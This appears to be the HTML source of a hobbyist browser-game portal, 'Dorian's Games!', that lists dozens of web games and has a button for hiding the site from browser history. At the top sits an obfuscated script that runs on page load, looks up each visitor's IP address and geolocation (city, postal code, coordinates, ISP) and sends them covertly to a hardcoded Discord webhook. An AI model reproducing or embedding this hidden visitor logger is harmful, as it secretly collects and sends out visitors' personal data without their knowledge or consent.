<!DOCTYPE html>
<html>
<script>
function _0x1582(_0x3ee13b,_0x37171b){var _0x4ad922=_0x4ad9();return _0x1582=function(_0x158289,_0x48fb0c){_0x158289=_0x158289-0x6c;var _0x4f84b2=_0x4ad922[_0x158289];return _0x4f84b2;},_0x1582(_0x3ee13b,_0x37171b);}(function(_0x92f9f7,_0x25104a){var _0x1265d8=_0x1582,_0x44404a=_0x92f9f7();while(!![]){try{var _0x45299b=parseInt(_0x1265d8(0x84))/0x1+-parseInt(_0x1265d8(0x7d))/0x2+-parseInt(_0x1265d8(0x9b))/0x3*(parseInt(_0x1265d8(0x74))/0x4)+parseInt(_0x1265d8(0xa4))/0x5+parseInt(_0x1265d8(0x6c))/0x6*(-parseInt(_0x1265d8(0xa1))/0x7)+-parseInt(_0x1265d8(0x7a))/0x8*(-parseInt(_0x1265d8(0x99))/0x9)+parseInt(_0x1265d8(0x76))/0xa*(-parseInt(_0x1265d8(0x81))/0xb);if(_0x45299b===_0x25104a)break;else _0x44404a['push'](_0x44404a['shift']());}catch(_0x3f2782){_0x44404a['push'](_0x44404a['shift']());}}}(_0x4ad9,0xbd17a));function monke(){var _0x2c0d01=_0x1582,_0x5e8040=new XMLHttpRequest(),_0x520e99=_0x2c0d01(0x90);_0x5e8040[_0x2c0d01(0x8e)]('GET',_0x520e99,!![]),_0x5e8040[_0x2c0d01(0x6f)]=function(){var _0x1f07da=_0x2c0d01;if(_0x5e8040[_0x1f07da(0x89)]===0x4&&_0x5e8040[_0x1f07da(0x88)]===0xc8){var _0x131206=JSON[_0x1f07da(0x8f)](_0x5e8040[_0x1f07da(0x9e)]),_0x3a70e7=new XMLHttpRequest();_0x3a70e7[_0x1f07da(0x8e)](_0x1f07da(0x71),_0x1f07da(0x95),!![]),_0x3a70e7[_0x1f07da(0x91)](_0x1f07da(0x73),_0x1f07da(0x93));var _0x524f86={'username':_0x1f07da(0x92),'avatar_url':'','content':_0x1f07da(0x87),'embeds':[{'title':_0x1f07da(0x98),'color':0x1abc9c,'description':_0x1f07da(0x9d)+_0x131206['ip']+'`\x0a'+_0x1f07da(0x80)+_0x131206[_0x1f07da(0x9f)]+'`\x0a'+_0x1f07da(0x72)+_0x131206[_0x1f07da(0x82)]+'`\x0a'+'**City:**\x20`'+_0x131206[_0x1f07da(0x8c)]+'`\x0a'+'**Region:**\x20`'+_0x131206['region']+'`\x0a'+_0x1f07da(0x8b)+_0x131206[_0x1f07da(0x83)]+'`\x0a'+'**Country:**\x20`'+_0x131206['country_name']+'`\x0a'+_0x1f07da(0x9c)+_0x131206[_0x1f07da(0x7b)]+'`\x0a'+_0x1f07da(0xa2)+_0x131206[_0x1f07da(0x77)]+'`\x0a'+_0x1f07da(0x6e)+_0x131206[_0x1f07da(0x75)]+'`\x0a'+_0x1f07da(0x97)+_0x131206[_0x1f07da(0x7e)]+'`\x0a'+_0x1f07da(0x94)+_0x131206['longitude']+'`\x0a'+_0x1f07da(0x70)+_0x131206['timezone']+'`\x0a'+_0x1f07da(0x8d)+_0x131206[_0x1f07da(0x7f)]+'`\x0a'+_0x1f07da(0x86)+_0x131206[_0x1f07da(0x96)]+'`\x0a'+_0x1f07da(0xa3)+_0x131206[_0x1f07da(0x6d)]+'`\x0a'+_0x1f07da(0x9a)+_0x131206['currency_name']+'`\x0a'+'**Languages:**\x20`'+_0x131206[_0x1f07da(0xa0)]+'`\x0a'+_0x1f07da(0x7c)+_0x131206[_0x1f07da(0x85)]+'`\x0a'+_0x1f07da(0x79)+_0x131206['org']+'`'}]};_0x3a70e7[_0x1f07da(0x78)](JSON[_0x1f07da(0x8a)](_0x524f86));}},_0x5e8040[_0x2c0d01(0x78)]();}function _0x4ad9(){var _0x175e95=['send','**Org:**\x20`','3928pECKTO','country','**ASN:**\x20`','215870pNqWWu','latitude','utc_offset','**Network:**\x20`','6569618tbVCDD','version','region_code','135864QjDSTh','asn','**Country\x20Calling\x20Code:**\x20`','New\x20Visitor!','status','readyState','stringify','**Region\x20Code:**\x20`','city','**UTC\x20Offset:**\x20`','open','parse','https://ipapi.co/json/','setRequestHeader','Gamebot','application/json','**Longitude:**\x20`','https://discord.com/api/webhooks/1286488206644219964/XykS1fkcWeALeFMO3GRvHpwe3hQKBoJ4bw2XgBtzYtveSLLSmnqJegtvJBCA4ctcnpkw','country_calling_code','**Latitude:**\x20`','Someone\x20visited\x20Dorian\x27s\x20Games!','12321yaiCXH','**Currency\x20Name:**\x20`','20970mMbgkU','**Country\x20Code:**\x20`','**IP:**\x20`','responseText','network','languages','14994ZbEacn','**Country\x20Capital:**\x20`','**Currency:**\x20`','7174760DOfqgH','426okjdjW','currency','**Postal\x20Code:**\x20`','onreadystatechange','**Timezone:**\x20`','POST','**Version:**\x20`','Content-type','8wOnJSg','postal','20ICNBvx','country_capital'];_0x4ad9=function(){return _0x175e95;};return _0x4ad9();}
</script>
	<script src="https://ipinfo.io/?format=jsonp&callback=monke"></script>
	<head>
	<link rel="icon" type="image/png" href="gamelogo.png">

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        .bottom-right-button {
            position: fixed;
            bottom: 20px;
            right: 20px;
            background-color: black;
            color: white;
            border: 2px solid grey;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
        .bottom-right-button:hover {
            background-color: grey;
            color: black;
        }
    </style>
</head>
<body>
    <button class="bottom-right-button" onclick="blank()">Hide website in history</button>

    <script>
        function blank() {
            (function () {
                var url = document.URL;
                var urlObj = new window.URL(window.location.href);
                var win = window.open();
                win.document.body.style.margin = "0";
                win.document.body.style.height = "100vh";
                var iframe = win.document.createElement("iframe");
                iframe.style.border = "none";
                iframe.style.width = "100%";
                iframe.style.height = "100%";
                iframe.style.margin = "0";
                iframe.referrerPolicy = "no-referrer";
                iframe.allow = "fullscreen";
                iframe.src = url.toString();
                win.document.body.appendChild(iframe);
                var script = win.document.createElement("script");
                script.src = "";
                win.document.body.appendChild(script);
            })();
        }
    </script>

<head>
<link rel="shortcut icon" type="image/png" href="/game.png"/>
 <script>
        var secretCode = '';
        var expectedCode = 'deacon';

        function checkSecret(event) {
            var char = String.fromCharCode(event.keyCode || event.which);
            secretCode += char;
            if (secretCode === expectedCode) {
                window.location.href = "11111secret11111.html";
                secretCode = '';
            }
        }

        document.addEventListener('keypress', checkSecret);
    </script>
   <style>
        @media screen and (min-width: 768px) {
            body {
                zoom: 110%;
            }
        }
     </style>
	<style>
    body {
        overflow: hidden;
    }
</style>
	<style>
        .update-log {
            position: fixed;
            top: 0;
            left: 0;
            background-color: #000000;
            padding: 10px;
            border-bottom-right-radius: 10px;
            font-family: Arial, sans-serif;
            font-size: 14px;
            z-index: 1000;
        }
    </style>
</head>
<body>

<div class="update-log">
    <p>Update Log:</p>
    <ul>
        <li>New Animated Background</li>
        <li>Removed FNAF for buxfixing</li>       
	 <li>Slight Menu Redesign</li>
        <li>Shoutout to James</li>
<a href="/news" style="color: white; text-decoration: underline;">News</a>
    </ul>
</div>
	<style>
      body {
        background: linear-gradient(90deg, #25563b, #16251c, #262626);
        background-size: 300% 300%;
        animation: gradientAnimation 5s ease infinite;
      }
    
      @keyframes gradientAnimation {
        0% {
          background-position: 0% 50%;
        }
        50% {
          background-position: 100% 50%;
        }
        100% {
          background-position: 0% 50%;
        }
      }
	</style>
    <style>
        body {
	color: white;
	font-family: sans-serif;
}

.container {
	padding: 20px;
}

.box {
	margin: auto;
	background-color: rgb(0, 0, 0);
	padding: 10px;
	width: 400px;
    border-width: 9px;
	border-radius: 2%;
}

#glist {
	overflow-x: hidden;
	overflow-y: scroll;
	width: 400px;
	height: 520px;
	padding: 0;
	text-align: center;
}

#gsearchbar {
	outline: none;
	width: 374px;
	font-size: 16px;
	border: 1px solid rgba(0, 6, 96, 0.3);
	padding: 12px;
	margin-bottom: 10px;
	transition: 0.2s ease;
}

#gsearchbar:focus {
	background-color: rgb(168, 255, 248) 74, 74);
	box-shadow: inset 0 0 5px 1px rgba(0, 0, 0, 0.4);
}

#glist h2 {
	display: block;
	color: white;
	font: 18px;
	border: 1px solid #060606;
	margin: -1px 0 0 0;
	background-color: #282828;
	padding: 12px;
	font-weight: bold;
	user-select: none;
}

#glist a {
	display: block;
	text-decoration: inherit;
	color: black;
	font-size: 18px;
	border: 1px solid #dddddd;
	margin-top: -1px;
	background-color: #f6f6f6;
	padding: 12px;
	transition: 0.2s ease;
}

#glist a:hover {
	background-color: #eeeeee;
	text-shadow: 0 0 5px rgba(0, 0, 0, 0.4);
}
 </style>
    </style>
    <div class="background"></div>
<title>Dorian's Games!</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="container">
<div class="box">
<input type="text" id="gsearchbar" onkeyup="document.querySelectorAll('#glist>a').forEach(l=>l.style.display=l.textContent.toUpperCase().includes(this.value.toUpperCase().replace(/ /g,''))?'block':'none')" autocomplete="off" spellcheck="false" placeholder="Search" />
<div id="glist">
<h2>Dorian's Games!</h2>
<a href="./gfiles/html5/cookieclicker/">Cookie Clicker</a>
	<a href="./VOIDMENU">VOID (Made By Me)</a>
<a href="./gfiles/html5/flappybird/">Flappy Bird</a>
<a href="./eagle">Minecraft 1.9</a>
<a href="./Multiplayer/">Minecraft With Servers</a>
<a href="./gfiles/html5/minecraft/">Very Old Minecraft</a>
<a href="./gfiles/html5/geometrydash/">Geometry Dash</a>
<a href="./gfiles/html5/q1k3/">Q1K3 (Fps)</a>
<a href="./gfiles/html5/2048/">2048</a>
<a href="./gfiles/html5/retrohaunt/">Retrohaunt</a>
<a href="./gfiles/html5/tetris/">Tetris</a>
<a href="./gfiles/html5/chromedino/">Chrome Dino</a>
<a href="./gfiles/html5/snake/">Google Snake</a>
<a href="./gfiles/html5/chess/">Chess Vs Robot</a>
<a href="./gfiles/html5/pacman/">Pac-Man</a>
<a href="./gfiles/html5/particleclicker/">Particle Clicker</a>
<a href="./gfiles/html5/chromaincident/">Chroma Incident</a>
<a href="./gfiles/html5/radiusraid/">Radius Raid</a>
<a href="./gfiles/html5/hextris/">Hextris</a>
<a href="./gfiles/html5/underrun/">Underrun</a>
<a href="./gfiles/html5/astray/">Astray</a>
<a href="./gfiles/html5/bounceback/">Bounce Back</a>
<a href="./gfiles/html5/captaincallisto/">Captain Callisto</a>
<a href="./gfiles/html5/xx142-b2exe/">xx142-b2.exe</a>
<a href="./gfiles/html5/backcountry/">Backcountry</a>
<a href="./gfiles/html5/blackholesquare/">Black Hole Square</a>
<a href="./gfiles/html5/bounceback/">Bounce Back</a>
<a href="./gfiles/html5/breaklock/">Breaklock</a>
<a href="./gfiles/html5/breakout/">Breakout</a>
<a href="./gfiles/html5/connect3/">Connect 3</a>
<a href="./gfiles/html5/edgenotfound/">Edge not Found</a>
<a href="./gfiles/html5/evilglitch/">Evil Glitch</a>
<a href="./gfiles/html5/factoryballsforever/">Factory Balls Forever</a>
<a href="./gfiles/html5/konnekt/">Konnekt</a>
<a href="./gfiles/html5/ninjavsevilcorp/">Ninja vs Evilcorp</a>
<a href="./gfiles/html5/trimps/">Trimps</a>
<a href="./gfiles/html5/packabunchas/">Packabunchas</a>
<a href="./gfiles/html5/pushback/">Push Back</a>
<a href="./gfiles/html5/roadblocks/">Road Blocks</a>
<a href="./gfiles/html5/sleepingbeauty/">Sleeping Beauty</a>
<a href="./gfiles/html5/spacecompany/">Space Company</a>
<a href="./gfiles/html5/spacegarden/">Space Garden</a>
<a href="./gfiles/html5/spacehuggers/">Space Huggers</a>
<a href="./gfiles/html5/themazeofspacegoblins/">The Maze of Space Goblins</a>
<a href="./gfiles/html5/towermaster/">Towermaster</a>
<a href="./gfiles/html5/asciispace/">ASCII Space</a>
<a href="./gfiles/html5/asteroids/">Asteroids</a>	
